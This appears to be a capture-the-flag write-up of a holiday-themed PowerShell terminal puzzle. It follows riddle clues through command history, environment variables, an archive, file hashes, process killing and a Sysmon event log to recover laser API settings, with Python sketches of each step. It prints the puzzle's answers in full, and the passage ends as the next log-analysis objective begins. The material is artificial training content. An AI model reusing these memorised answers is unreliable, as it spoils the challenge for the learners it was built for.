🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲
🗲                                                                                🗲
🗲 Elf University Student Research Terminal - Christmas Cheer Laser Project       🗲
🗲 ------------------------------------------------------------------------------ 🗲
🗲 The research department at Elf University is currently working on a top-secret 🗲
🗲 Laser which shoots laser beams of Christmas cheer at a range of hundreds of    🗲
🗲 miles. The student research team was successfully able to tweak the laser to   🗲
🗲 JUST the right settings to achieve 5 Mega-Jollies per liter of laser output.   🗲
🗲 Unfortunately, someone broke into the research terminal, changed the laser     🗲
🗲 settings through the Web API and left a note behind at /home/callingcard.txt.  🗲
🗲 Read the calling card and follow the clues to find the correct laser Settings. 🗲
🗲 Apply these correct settings to the laser using it's Web API to achieve laser  🗲
🗲 output of 5 Mega-Jollies per liter.                                            🗲
🗲                                                                                🗲
🗲 Use (Invoke-WebRequest -Uri http://localhost:1225/).RawContent for more info.  🗲
🗲                                                                                🗲
🗲🗲🗲🗲🗲🗲🗲🗲

After reading the information in the terminal we learn that we need to recalibrate the laser and tweak the settings to achieve 5 Mega-Jollies per liter of laser output. We also initially learn that someone left a note behind at /home/callingcard.txt with information on what they might have done to mess with the laser.

We also learn that by executing (Invoke-WebRequest -Uri http://localhost:1225/).RawContent we can see the settings and access the Web API to tune the laser… so let’s do just that!

PS /home/elf> (Invoke-WebRequest -Uri http://localhost:1225/).RawContent
HTTP/1.0 200 OK                                                                                   
Server: Werkzeug/0.16.0                                                                           
Server: Python/3.6.9                                                                              
Date: Sat, 14 Dec 2019 23:43:06 GMT                                                               
Content-Type: text/html; charset=utf-8
Content-Length: 860
<html>
<body>
<pre>
----------------------------------------------------
Christmas Cheer Laser Project Web API
----------------------------------------------------
Turn the laser on/off:
GET http://localhost:1225/api/on
GET http://localhost:1225/api/off
Check the current Mega-Jollies of laser output
GET http://localhost:1225/api/output
Change the lense refraction value (1.0 - 2.0):
GET http://localhost:1225/api/refraction?val=1.0
Change laser temperature in degrees Celsius:
GET http://localhost:1225/api/temperature?val=-10
Change the mirror angle value (0 - 359):
GET http://localhost:1225/api/angle?val=45.1
Change gaseous elements mixture:
POST http://localhost:1225/api/gas
POST BODY EXAMPLE (gas mixture percentages):
O=5&H=5&He=5&N=5&Ne=20&Ar=10&Xe=10&F=20&Kr=10&Rn=10
----------------------------------------------------
</pre>
</body>
</html>

Alright, awesome! So we can see all the API endpoints that we can use to tune the laser and see the current power level. Let’s check the current laser output by calling the /api/output endpoint.

PS /home/elf> (Invoke-WebRequest -Uri http://localhost:1225/api/output).RawContent
HTTP/1.0 200 OK                                                                                   
Server: Werkzeug/0.16.0                                                                           
Server: Python/3.6.9                                                                              
Date: Sat, 14 Dec 2019 23:44:26 GMT                                                               
Content-Type: text/html; charset=utf-8
Content-Length: 58
Failure - Only 3.36 Mega-Jollies of Laser Output Reached!

Hmm… so we only have 3.36 Mega-Jollies of laser output. Let’s read that callingcard.txt file and see if it won’t help us in fixing this mess!

PS /home/elf> type /home/callingcard.txt  
What's become of your dear laser?  
Fa la la la la, la la la la  
Seems you can't now seem to raise her!  
Fa la la la la, la la la la  
Could commands hold riddles in hist'ry?  
Fa la la la la, la la la la  
Nay! You'll ever suffer myst'ry!  
Fa la la la la, la la la la

Well fa la la la la, what the heck did the attacker do to the laser? It seems that he’s leaving us clues in the form of riddles. The one thing that stands out to me right away is the following line: “Could commands hold riddles in hist’ry?”

Commands in history? Well, since this is PowerShell, we can actually see what commands were previously executed, just like in Linux. If you’re not familiar with PowerShell, Sparkle gave us a hint to read the SANS PowerShell Cheat Sheet, which should help us out a bit.

In PowerShell, we can use the Get-History command to see previous command input.

PS /home/elf> Get-History
Id CommandLine
  -- -----------
   1 Get-Help -Name Get-Process 
   2 Get-Help -Name Get-* 
   3 Set-ExecutionPolicy Unrestricted 
   4 Get-Service | ConvertTo-HTML -Property Name, Status > C:\services.htm 
   5 Get-Service | Export-CSV c:\service.csv 
   6 Get-Service | Select-Object Name, Status | Export-CSV c:\service.csv 
   7 (Invoke-WebRequest http://127.0.0.1:1225/api/angle?val=65.5).RawContent
   8 Get-EventLog -Log "Application" 
   9 I have many name=value variables that I share to applications system wide. At a command I w…
  10 type /home/callingcard.txt

Nice, so we got a list of the command history! Right away, in #7 we can see that an API call was made to change the angle of the laser - (Invoke-WebRequest http://127.0.0.1:1225/api/angle?val=65.5).RawContent. So let’s save that command for later use.

Also, in #9 we see a continuation of the riddle… but it’s cut off. So what we can do is select that specific history ID, and then use the Format-List cmdlet to display the long line of text in full. We can also use fl as shorthand for Format-List, as seen below.

PS /home/elf> Get-History -Id 9 | fl

Id                 : 9
CommandLine        : I have many name=value variables that I share to applications system wide. 
                     At a command I will reveal my secrets once you Get my Child Items.
ExecutionStatus    : Completed
StartExecutionTime : 11/29/19 4:57:16 PM
EndExecutionTime   : 11/29/19 4:57:16 PM
Duration           : 00:00:00.6090308

So the next riddle states that there are many name=value variables which are shared system wide, and that we need to Get Child Items. Well, for the child items, I know that we will need to use the Get-ChildItem cmdlet from PowerShell, but against what?

Well, if we think about name=value pairs that are shared system wide, then I’m immediately thinking of environment variables. By looking into the PowerShell documentation on environment variables, we see that the variables can be listed through the Env: drive.

So let’s go ahead and use the Get-ChildItem command against that to see what we can discover.

PS /home/elf> Get-ChildItem -Path Env:

Name                           Value
----                           -----
_                              /bin/su
DOTNET_SYSTEM_GLOBALIZATION_I… false
HOME                           /home/elf
HOSTNAME                       48a2ebd93d8b
LANG                           en_US.UTF-8
LC_ALL                         en_US.UTF-8
LOGNAME                        elf
MAIL                           /var/mail/elf
PATH                           /opt/microsoft/powershell/6:/usr/local/sbin:/usr/local/bin:/usr/s…
PSModuleAnalysisCachePath      /var/cache/microsoft/powershell/PSModuleAnalysisCache/ModuleAnaly…
PSModulePath                   /home/elf/.local/share/powershell/Modules:/usr/local/share/powers…
PWD                            /home/elf
RESOURCE_ID                    c658a4f4-8104-4d61-a3d5-bc3109ae9ff1
riddle                         Squeezed and compressed I am hidden away. Expand me from my priso…
SHELL                          /home/elf/elf
SHLVL                          1
TERM                           xterm
USER                           elf
USERDOMAIN                     laserterminal
userdomain                     laserterminal
USERNAME                       elf
username                       elf

Right away we see we have a riddle variable with a value! Unfortunately for us… it’s cut off. So let’s go ahead and grab the value of each variable, and format that for readability.

PS /home/elf> Get-ChildItem -Path Env: | select Value | fl 
Value : /bin/su
Value : false
Value : /home/elf
Value : 2f466e986a7f
Value : en_US.UTF-8
Value : en_US.UTF-8
Value : elf
Value : /var/mail/elf
Value : /opt/microsoft/powershell/6:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:
        /usr/games:/usr/local/games
Value : /var/cache/microsoft/powershell/PSModuleAnalysisCache/ModuleAnalysisCache
Value : /home/elf/.local/share/powershell/Modules:/usr/local/share/powershell/Modules:/opt/micros
        oft/powershell/6/Modules
Value : /home/elf
Value : 8ec19745-0332-4a36-95e2-a185d3db17a0
Value : Squeezed and compressed I am hidden away. Expand me from my prison and I will show you 
        the way. Recurse through all /etc and Sort on my LastWriteTime to reveal im the newest 
        of all.
Value : /home/elf/elf
Value : 1
Value : xterm
Value : elf
Value : laserterminal
Value : laserterminal
Value : elf
Value : elf

Nice, now we can read the riddle! The initial line of squeezed and compressed makes me think that we will be looking at some sort of archive or zip file. We learn that this is hidden away and we need to recurse through /etc/ and sort by LastWriteTime to show the newest object first, which means that we need to sort descending.
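As a rough illustration of that logic outside PowerShell, here is a Python sketch that walks a directory tree and returns the most recently modified entries first. The function name and the limit of 10 are my own choices for the example; it is not the command used in the challenge.

```python
import os


def newest_entries(root, limit=10):
    """Return up to `limit` paths under `root`, most recently modified first."""
    entries = []
    for dirpath, dirnames, filenames in os.walk(root):
        # Include directories as well as files, like a recursive listing would.
        for name in dirnames + filenames:
            full = os.path.join(dirpath, name)
            try:
                # lstat so that symlinks are reported without being followed.
                entries.append((os.lstat(full).st_mtime, full))
            except OSError:
                continue  # unreadable or vanished entry, skip it
    entries.sort(reverse=True)  # newest modification time first
    return [path for _mtime, path in entries[:limit]]


if __name__ == "__main__":
    for path in newest_entries("/etc"):
        print(path)
```

Sorting in descending order is what puts the newest object at the top of the list.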

Let’s do just that, but since there might be a lot of data, we can use the Select-Object cmdlet to select the top 10 results as follows.

PS /home/elf> Get-ChildItem -Path /etc/ -Recurse | Sort-Object LastWriteTime -Descending | Select-Object -first 10

    Directory: /etc/apt

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
--r---           1/12/20 12:32 AM        5662902 archive

    Directory: /etc

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
--r---           1/12/20 12:32 AM             13 hostname
--r---           1/12/20 12:32 AM            113 resolv.conf
--r---           1/12/20 12:32 AM            175 hosts
-----l           1/12/20 12:32 AM             12 mtab
--r---          12/13/19  5:16 PM            581 group
------          12/13/19  5:16 PM            482 gshadow
--r---          12/13/19  5:16 PM            575 group-
------          12/13/19  5:16 PM            476 gshadow-

    Directory: /etc/systemd/system

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-r---          12/13/19  5:15 PM                timers.target.wants

We can see that the first object is /etc/apt/archive, so let’s go ahead and use the Expand-Archive command to uncompress the archive and then view the files within it.

PS /home/elf> Expand-Archive -LiteralPath /etc/apt/archive  
PS /home/elf> dir  
Directory: /home/elf  
  
Mode  LastWriteTime  Length Name  
----  -------------  ------ ----  
d-----  12/15/19 12:51 AM  archive  
d-r---  12/13/19  5:15 PM  depths  
--r---  12/13/19  4:29 PM  2029 motd

PS /home/elf> Get-ChildItem ./archive/ -Recurse


    Directory: /home/elf/archive

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----           1/12/20 12:50 AM                refraction

    Directory: /home/elf/archive/refraction

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
------           11/7/19 11:57 AM            134 riddle
------           11/5/19  2:26 PM        5724384 runme.elf

Right away we see we have two files in the refraction folder within the archive. First is the riddle, and then there is a runme.elf file, which I’m guessing we need to run.

Unfortunately, we can’t just call the file directly to execute it like we do in Linux, because we will get an error like so:

PS /home/elf> cd ./archive/refraction/
PS /home/elf/archive/refraction> ./runme.elf
Program 'runme.elf' failed to run: No such file or directoryAt line:1 char:1
+ ./runme.elf
+ ~~~~~~~~~~~.
At line:1 char:1
+ ./runme.elf
+ ~~~~~~~~~~~
+ CategoryInfo          : ResourceUnavailable: (:) [], ApplicationFailedException
+ FullyQualifiedErrorId : NativeCommandFailed

We can simply fix this by giving the file execute permission with chmod, and then executing it.

PS /home/elf/archive/refraction> chmod +x ./runme.elf  
PS /home/elf/archive/refraction> ./runme.elf  
refraction?val=1.867

Boom, and there we go! We got the next value for the laser, and it’s the refraction value. Since we have that, let’s read that riddle file inside the archive.

PS /home/elf> type ./archive/refraction/riddle  
Very shallow am I in the depths of your elf home. You can find my entity by using my md5 identity:

25520151A320B5B0D21561F92C8F6224

Alright, so it seems that this file is in a directory called depths, which is in our home directory as we’ve seen previously. We are also provided an md5 sum, so we need to hash each file and compare it to the provided identity.
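The "hash each file and compare" idea looks like this as a minimal Python sketch. The find_by_md5 helper is a name I made up; unlike the PowerShell approach that follows, it walks the whole tree with no depth limit and stops at the first match.

```python
import hashlib
import os


def find_by_md5(root, wanted_hex):
    """Return the first file under `root` whose MD5 matches `wanted_hex`, else None."""
    wanted = wanted_hex.lower()  # hexdigest() is lowercase, the riddle's hash is uppercase
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            full = os.path.join(dirpath, name)
            digest = hashlib.md5()
            try:
                with open(full, "rb") as handle:
                    # Read in chunks so large files do not need to fit in memory.
                    for chunk in iter(lambda: handle.read(65536), b""):
                        digest.update(chunk)
            except OSError:
                continue  # unreadable file, skip it
            if digest.hexdigest() == wanted:
                return full
    return None


if __name__ == "__main__":
    print(find_by_md5("./depths", "25520151A320B5B0D21561F92C8F6224"))
```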

The command I used for this portion of the challenge was a little complex, so I highly suggest you Google around for what it does if you’re confused.

Put simply, I recurse through the depths directory to a depth of 3, and then select only the necessary properties from the listing, such as the directory name, name of the file, last write time, and file length. Then we create a new calculated property, as seen in the @{} expression.

We call the calculated property FileHash (set by N=) and set its value (set by E=) to the file’s MD5 hash. We then write all of this data to a file called hash.

PS /home/elf> Get-ChildItem -Path ./depths/ -File -Recurse -Depth 3 | Select DirectoryName,Name,LastWriteTime,Length,@{N='FileHash';E={(Get-FileHash -Algorithm MD5 $_).Hash}} >> hash

Once we have that, we can check whether the MD5 sum provided to us is in that file. If it is, we can match on that pattern and print the 5 lines before and after it, as seen below.

PS /home/elf> type ./hash | Select-String -Pattern "25520151A320B5B0D21561F92C8F6224"
FileHash      : 25520151A320B5B0D21561F92C8F6224
PS /home/elf> type ./hash | Select-String -Pattern "25520151A320B5B0D21561F92C8F6224" -Context 5
  
  DirectoryName : /home/elf/depths/produce
  Name          : thhy5hll.txt
  LastWriteTime : 11/18/19 7:53:25 PM
  Length        : 224
> FileHash      : 25520151A320B5B0D21561F92C8F6224
  
  DirectoryName : /home/elf/depths/produce
  Name          : us04zoj3.txt
  LastWriteTime : 11/18/19 7:53:25 PM
  Length        : 79

Nice, so the file with the same hash is located at /home/elf/depths/produce/thhy5hll.txt. So let's go ahead and read it.

PS /home/elf> type /home/elf/depths/produce/thhy5hll.txt  
temperature?val=-33.5

I am one of many thousand similar txts contained within the deepest of /home/elf/depths. Finding me will give you the most strength but doing so will require Piping all the FullName's to Sort Length.

And there we have it, the next part of the API, this time we get the temperature value!
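For anyone more at home in Python than PowerShell, the hash hunt above can be sketched as follows. This is only an illustration of the same idea (walk a tree, hash every file, compare against the riddle's value); the function name find_by_md5 is my own and is not part of the challenge.

```python
import hashlib
from pathlib import Path


def find_by_md5(root, wanted_md5):
    """Return every file under root whose MD5 digest equals wanted_md5."""
    wanted = wanted_md5.lower()  # the riddle prints the hash in upper case
    matches = []
    for path in Path(root).rglob("*"):
        if not path.is_file():
            continue
        # Files in this challenge are tiny, so reading them whole is fine.
        digest = hashlib.md5(path.read_bytes()).hexdigest()
        if digest == wanted:
            matches.append(path)
    return matches
```

Calling find_by_md5("./depths", "25520151A320B5B0D21561F92C8F6224") would be the equivalent of the Get-FileHash pipeline, minus the depth limit.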

After reading the next part of the riddle, we see that our next answer lies in a text file hidden in the depths directory again. It also says that we need to get each file's full path and sort by its length.

So, as before, let's recurse the depths directory, select the full name along with its length (by creating a new calculated property), and finally sort by that property in descending order so the longest path comes first.

PS /home/elf> Dir ./depths/ -file -recurse | select Fullname,@{Name="NameLength";Expression={$_.fullname.length}} | sort NameLength -Descending | fl >> sort.txt

Once we have all that piped out to a file, let's just select the first 10 lines.

PS /home/elf> type ./sort.txt | select -first 10  
  
FullName  : /home/elf/depths/larger/cloud/behavior/beauty/enemy/produce/age/chair/unknown/escape/vote/long/writer/behind/ahead/thin/occasionally/explore/tape/wherever/practical/therefore/cool/plate/ice/play/truth/potatoes/beauty/fourth/careful/dawn/adult/either/burn/end/accurate/rubbed/cake/main/she/threw/eager/trip/to/soon/think/fall/is/greatest/become/accident/labor/sail/dropped/fox/0jhj5xz6.txt  
NameLength : 388

FullName  : /home/elf/depths/larger/cloud/behavior/beauty/enemy/produce/age/chair/unknown/escape/vote/long/writer/behind/ahead/thin/occasionally/explore/tape/wherever/practical/therefore/cool/plate/ice/play/truth/potatoes/beauty/fourth/careful/dawn/adult/either/burn/end/accurate/rubbed/cake/main/she/threw/eager/trip/to/soon/think/fall/is/greatest/become/accident/labor/sail/dropped/u41dl1fz.txt  
NameLength : 384

FullName  : /home/elf/depths/larger/cloud/behavior/beauty/enemy/produce/age/chair/unknown/escape/vote/long/writer/behind/ahead/thin/occasionally/explore/tape/wherever/practical/therefore/cool/plate/ice/play/truth/potatoes/beauty/fourth/careful/dawn/adult/either/burn/end/accurate/rubbed/cake/main/she/threw/eager/trip/to/soon/think/fall/is/greatest/become/accident/labor/sail/dropped/s40exptd.txt  
NameLength : 384
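As a side note, the same "sort by full path length" trick can be sketched in Python. This is just an illustration of the idea, not what I ran in the terminal, and longest_paths is a name I made up for it.

```python
import os


def longest_paths(root, top=10):
    """Return the `top` longest full file paths under root, longest first."""
    paths = []
    for dirpath, _dirnames, filenames in os.walk(root):
        base = os.path.abspath(dirpath)
        for name in filenames:
            paths.append(os.path.join(base, name))
    # Sort on the length of the path string, mirroring the NameLength property.
    return sorted(paths, key=len, reverse=True)[:top]
```

The first entry of longest_paths("./depths") would be the file sitting at the very bottom of the directory tree.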

PS /home/elf> type /home/elf/depths/larger/cloud/behavior/beauty/enemy/produce/age/chair/unknown/escape/vote/long/writer/behind/ahead/thin/occasionally/explore/tape/wherever/practical/therefore/cool/plate/ice/play/truth/potatoes/beauty/fourth/careful/dawn/adult/either/burn/end/accurate/rubbed/cake/main/she/threw/eager/trip/to/soon/think/fall/is/greatest/become/accident/labor/sail/dropped/fox/0jhj5xz6.txt  
Get process information to include Username identification. Stop Process to show me you're skilled and in this order they must be killed:

bushy  
alabaster  
minty  
holly

Do this for me and then you /shall/see .

Nice, right away we can see that the first file contains our riddle! For this portion of the riddle it seems that we need to kill a set of processes in a specific order. Once done, we should get something at a path called /shall/see.

So for this, we can simply use Get-Process to see which processes are currently running. We can also pass the -IncludeUserName option to see the users who own those processes, since we have to kill them per user in the specified order.

PS /home/elf> Get-Process -IncludeUserName

     WS(M)   CPU(s)      Id UserName                       ProcessName
     -----   ------      -- --------                       -----------
     28.65     2.00       6 root                           CheerLaserServi
    122.60     9.01      31 elf                            elf
      3.52     0.03       1 root                           init
      0.81     0.00      25 bushy                          sleep
      0.73     0.00      26 alabaster                      sleep
      0.80     0.00      27 minty                          sleep
      0.83     0.00      29 holly                          sleep
      3.50     0.00      30 root                           su

Alright, so now we need to kill the processes in the order specified. We can do this by using the Stop-Process cmdlet.

PS /home/elf> Stop-Process -Id 25
PS /home/elf> Stop-Process -Id 26
PS /home/elf> Stop-Process -Id 27
PS /home/elf> Stop-Process -Id 29
PS /home/elf> Get-Process -IncludeUserName

     WS(M)   CPU(s)      Id UserName                       ProcessName
     -----   ------      -- --------                       -----------
     27.04     2.15       6 root                           CheerLaserServi
    129.80     9.46      31 elf                            elf
      3.52     0.03       1 root                           init
      3.50     0.00      30 root                           su
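With only four processes it's easy to read the PIDs off the table by hand, but the mapping from "users in riddle order" to "PIDs to stop" can be sketched like so. The tuples below are copied from the first Get-Process listing above; the helper name pids_in_order is purely illustrative.

```python
# (pid, owner, process name) rows taken from the Get-Process output above.
PROCESSES = [
    (6, "root", "CheerLaserServi"),
    (31, "elf", "elf"),
    (1, "root", "init"),
    (25, "bushy", "sleep"),
    (26, "alabaster", "sleep"),
    (27, "minty", "sleep"),
    (29, "holly", "sleep"),
    (30, "root", "su"),
]

# The order demanded by the riddle.
KILL_ORDER = ["bushy", "alabaster", "minty", "holly"]


def pids_in_order(processes, users):
    """Return the PIDs owned by each user, following the order of `users`."""
    by_user = {}
    for pid, user, _name in processes:
        by_user.setdefault(user, []).append(pid)
    return [pid for user in users for pid in by_user.get(user, [])]
```

The resulting list is exactly the sequence of IDs passed to Stop-Process.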

With the processes killed, let's see if that path contains anything... or if it even exists.

PS /home/elf> dir /shall/see


    Directory: /shall

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
--r---           1/12/20  1:23 AM            149 see

PS /home/elf> type /shall/see
Get the .xml children of /etc - an event log to be found. Group all .Id's and the last thing will be in the Properties of the lonely unique event Id.

Another riddle? Geez, how many more are there?! Okay, so for this riddle we need to recurse the /etc/ path again and look for an XML file. Once that's done, we need to group all of the .Id values in the XML file, and whatever stands out will be our next clue.

Okay, so let's find that XML file first.

PS /home/elf> Get-ChildItem -Path /etc/ -File -Recurse -Include *.xml 

    Directory: /etc/systemd/system/timers.target.wants

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
--r---          11/18/19  7:53 PM       10006962 EventLog.xml

After running the search, we see that the XML file in question looks like an export of Windows Event Logs, which might mean that the IDs are actually Windows event IDs!

Right, so by using some complex PowerShell commands, let's parse this XML file and see what kind of objects are contained within it.

PS /home/elf> [xml]$xml = Get-Content -Path /etc/systemd/system/timers.target.wants/EventLog.xml
PS /home/elf> $xml

Objs
----
Objs

PS /home/elf> $xml.Objs

Version xmlns                                           Obj
------- -----                                           ---
1.1.0.1 http://schemas.microsoft.com/powershell/2004/04 {Obj, Obj, Obj, Obj…}

PS /home/elf> type /etc/systemd/system/timers.target.wants/EventLog.xml | select -first 20
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>System.Diagnostics.Eventing.Reader.EventLogRecord</T>
      <T>System.Diagnostics.Eventing.Reader.EventRecord</T>
      <T>System.Object</T>
    </TN>
    <ToString>System.Diagnostics.Eventing.Reader.EventLogRecord</ToString>
    <Props>
      <I32 N="Id">3</I32>
      <By N="Version">5</By>
      <Nil N="Qualifiers" />
      <By N="Level">4</By>
      <I32 N="Task">3</I32>
      <I16 N="Opcode">0</I16>
      <I64 N="Keywords">-9223372036854775808</I64>
      <I64 N="RecordId">2194</I64>
      <S N="ProviderName">Microsoft-Windows-Sysmon</S>
      <G N="ProviderId">5770385f-c22a-43e0-bf4c-06f5698ffbd9</G>
      <S N="LogName">Microsoft-Windows-Sysmon/Operational</S>

Seemingly I was right, these are event IDs associated with Sysmon. Okay, so we need to find that "lonely" event ID. So let's pull out every Id line and group them using the Group-Object cmdlet.

PS /home/elf> type /etc/systemd/system/timers.target.wants/EventLog.xml | Select-String -Pattern 'N="Id"' | Group-Object

Count Name                      Group
----- ----                      -----
    1       <I32 N="Id">1</I32> {      <I32 N="Id">1</I32>}
   39       <I32 N="Id">2</I32> {      <I32 N="Id">2</I32>,       <I32 N="Id">2</I32>,       <I3…
  179       <I32 N="Id">3</I32> {      <I32 N="Id">3</I32>,       <I32 N="Id">3</I32>,       <I3…
    2       <I32 N="Id">4</I32> {      <I32 N="Id">4</I32>,       <I32 N="Id">4</I32>}
  905       <I32 N="Id">5</I32> {      <I32 N="Id">5</I32>,       <I32 N="Id">5</I32>,       <I3…
   98       <I32 N="Id">6</I32> {      <I32 N="Id">6</I32>,       <I32 N="Id">6</I32>,       <I3…
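The grouping step is really just a frequency count, so here is a minimal Python sketch of it. It assumes the Id elements always look like the <I32 N="Id"> lines shown in the file above; count_event_ids and lonely_ids are names I picked for the example.

```python
import re
from collections import Counter

# Matches lines such as:  <I32 N="Id">3</I32>
ID_LINE = re.compile(r'<I32 N="Id">(\d+)</I32>')


def count_event_ids(lines):
    """Count how often each event Id appears in an iterable of text lines."""
    counts = Counter()
    for line in lines:
        match = ID_LINE.search(line)
        if match:
            counts[int(match.group(1))] += 1
    return counts


def lonely_ids(counts):
    """Return the Ids that occur exactly once."""
    return [event_id for event_id, seen in counts.items() if seen == 1]
```

Passing an open file handle for EventLog.xml to count_event_ids would give the same tallies as the Group-Object table.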

Right away I can see that the lonely event Id is "1". So, let's grab that event ID and print the 150 lines directly after it.

PS /home/elf> type /etc/systemd/system/timers.target.wants/EventLog.xml | Select-String -Pattern 'N="Id">1<' -Context 0, 150

>       <I32 N="Id">1</I32>
        <By N="Version">5</By>
        <Nil N="Qualifiers" />
        <By N="Level">4</By>
        <I32 N="Task">1</I32>
        <I16 N="Opcode">0</I16>
        <I64 N="Keywords">-9223372036854775808</I64>
        <I64 N="RecordId">2422</I64>
        <S N="ProviderName">Microsoft-Windows-Sysmon</S>
        <G N="ProviderId">5770385f-c22a-43e0-bf4c-06f5698ffbd9</G>
        <S N="LogName">Microsoft-Windows-Sysmon/Operational</S>
        <I32 N="ProcessId">1960</I32>
        <I32 N="ThreadId">6640</I32>
        <S N="MachineName">elfuresearch</S>
        ---snip---
              <TNRef RefId="1806" />
              <ToString>System.Diagnostics.Eventing.Reader.EventProperty</ToString>
              <Props>
                <S N="Value">PowerShell.EXE</S>
              </Props>
            </Obj>
            <Obj RefId="18016">
              <TNRef RefId="1806" />
              <ToString>System.Diagnostics.Eventing.Reader.EventProperty</ToString>
              <Props>
                <S N="Value">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -c 
"`$correct_gases_postbody = @{`n    O=6`n    H=7`n    He=3`n    N=4`n    Ne=22`n    Ar=11`n    
Xe=10`n    F=20`n    Kr=8`n    Rn=9`n}`n"</S>
              </Props>
            </Obj>
            <Obj RefId="18017">
              <TNRef RefId="1806" />
              <ToString>System.Diagnostics.Eventing.Reader.EventProperty</ToString>
              <Props>
                <S N="Value">C:\</S>
              </Props>
            </Obj>
            <Obj RefId="18018">
              <TNRef RefId="1806" />

If we dig through this event log, we should see toward the end the correct gases used for the laser! If we clean it up we get something like this: O=6&H=7&He=3&N=4&Ne=22&Ar=11&Xe=10&F=20&Kr=8&Rn=9.
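I did that clean-up by hand, but it can also be sketched in a few lines of Python. The RAW string is the command line value from the event above (with the line wraps removed), and gases_to_body is just an illustrative helper that assumes every gas is written as an element symbol followed by = and a number.

```python
import re
from urllib.parse import urlencode

# The PowerShell hashtable as it appears in the event's command line value.
RAW = (
    "`$correct_gases_postbody = @{`n    O=6`n    H=7`n    He=3`n    N=4`n"
    "    Ne=22`n    Ar=11`n    Xe=10`n    F=20`n    Kr=8`n    Rn=9`n}`n"
)


def gases_to_body(raw):
    """Turn the logged hashtable text into a form-encoded POST body."""
    # An element symbol is one capital letter plus an optional lowercase one.
    pairs = re.findall(r"([A-Z][a-z]?)=(\d+)", raw)
    return urlencode(pairs)
```

gases_to_body(RAW) keeps the gases in the order they were logged, which matches the string above.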

Nice! Now that we finally have all the settings we need, let's go ahead and update the laser using the API.

PS /home/elf> (Invoke-WebRequest http://127.0.0.1:1225/api/off).RawContent
HTTP/1.0 200 OK  
Server: Werkzeug/0.16.0  
Server: Python/3.6.9  
Date: Mon, 16 Dec 2019 02:34:20 GMT  
Content-Type: text/html; charset=utf-8  
Content-Length: 33

Christmas Cheer Laser Powered Off  
PS /home/elf> (Invoke-WebRequest http://127.0.0.1:1225/api/angle?val=65.5).RawContent
HTTP/1.0 200 OK  
Server: Werkzeug/0.16.0  
Date: Mon, 16 Dec 2019 02:34:29 GMT  
Content-Type: text/html; charset=utf-8  
Content-Length: 77

Updated Mirror Angle - Check /api/output if 5 Mega-Jollies per liter reached.  
PS /home/elf> (Invoke-WebRequest http://127.0.0.1:1225/api/refraction?val=1.867).RawContent
HTTP/1.0 200 OK  
Server: Werkzeug/0.16.0  
Server: Python/3.6.9  
Date: Mon, 16 Dec 2019 02:34:35 GMT  
Content-Type: text/html; charset=utf-8  
Content-Length: 87

Updated Lense Refraction Level - Check /api/output if 5 Mega-Jollies per liter reached.  
PS /home/elf> (Invoke-WebRequest http://127.0.0.1:1225/api/temperature?val=-33.5).RawContent
HTTP/1.0 200 OK  
Server: Werkzeug/0.16.0  
Server: Python/3.6.9  
Date: Mon, 16 Dec 2019 02:34:41 GMT  
Content-Type: text/html; charset=utf-8  
Content-Length: 82

Updated Laser Temperature - Check /api/output if 5 Mega-Jollies per liter reached.

PS /home/elf> $postParam = "O=6&H=7&He=3&N=4&Ne=22&Ar=11&Xe=10&F=20&Kr=8&Rn=9"

PS /home/elf> (Invoke-WebRequest http://127.0.0.1:1225/api/gas -Method POST -Body $postParam).RawContent
HTTP/1.0 200 OK  
Server: Werkzeug/0.16.0  
Server: Python/3.6.9  
Date: Mon, 16 Dec 2019 02:34:43 GMT  
Content-Type: text/html; charset=utf-8  
Content-Length: 81

Updated Gas Measurements - Check /api/output if 5 Mega-Jollies per liter reached.  
PS /home/elf> (Invoke-WebRequest http://127.0.0.1:1225/api/on).RawContent
HTTP/1.0 200 OK  
Server: Werkzeug/0.16.0  
Server: Python/3.6.9  
Date: Mon, 16 Dec 2019 02:34:49 GMT  
Content-Type: text/html; charset=utf-8  
Content-Length: 32

Christmas Cheer Laser Powered On  
PS /home/elf> (Invoke-WebRequest http://127.0.0.1:1225/api/output).RawContent
HTTP/1.0 200 OK  
Server: Werkzeug/0.16.0  
Server: Python/3.6.9  
Date: Mon, 16 Dec 2019 02:34:52 GMT  
Content-Type: text/html; charset=utf-8  
Content-Length: 200

Success! - 6.73 Mega-Jollies of Laser Output Reached!

Success! Well that was a pain, but at least we got it!
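If you'd rather script the whole power cycle than paste seven commands, here is a rough Python sketch of the same sequence using only the standard library. The endpoints and values are the ones used above; the split into build_requests and run is my own arrangement, and run only works from inside the terminal where the laser API is listening.

```python
from urllib.parse import urlencode
from urllib.request import Request, urlopen

BASE = "http://127.0.0.1:1225/api"


def build_requests(angle, refraction, temperature, gases):
    """Build the requests in order: off, settings, gas POST, on, output."""
    gas_body = urlencode(gases).encode()
    return [
        Request(f"{BASE}/off"),
        Request(f"{BASE}/angle?val={angle}"),
        Request(f"{BASE}/refraction?val={refraction}"),
        Request(f"{BASE}/temperature?val={temperature}"),
        Request(f"{BASE}/gas", data=gas_body, method="POST"),
        Request(f"{BASE}/on"),
        Request(f"{BASE}/output"),
    ]


def run(requests):
    """Send each request in turn and print the body the API returns."""
    for req in requests:
        with urlopen(req) as resp:
            print(req.full_url, "->", resp.read().decode().strip())
```

The order matters here: the laser is switched off first, reconfigured, switched back on, and only then is the output checked.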

Network Log Analysis: Determine Compromised System

Upon successfully completing the Xmas Laser Cheer CranPI, we can talk to Sparkle again for more hints that will allow us to complete the next objective.

For this objective, it seems that we need to help identify the IP address of the malware-infected system using the provided Zeek logs. Now if we look at the hints provided to us, we see Sparkle gave us a link to RITA's homepage.

After looking into what RITA is, we learn that it is an open source framework for network traffic analysis which allows for the ingestion of Bro/Zeek logs in TSV format.

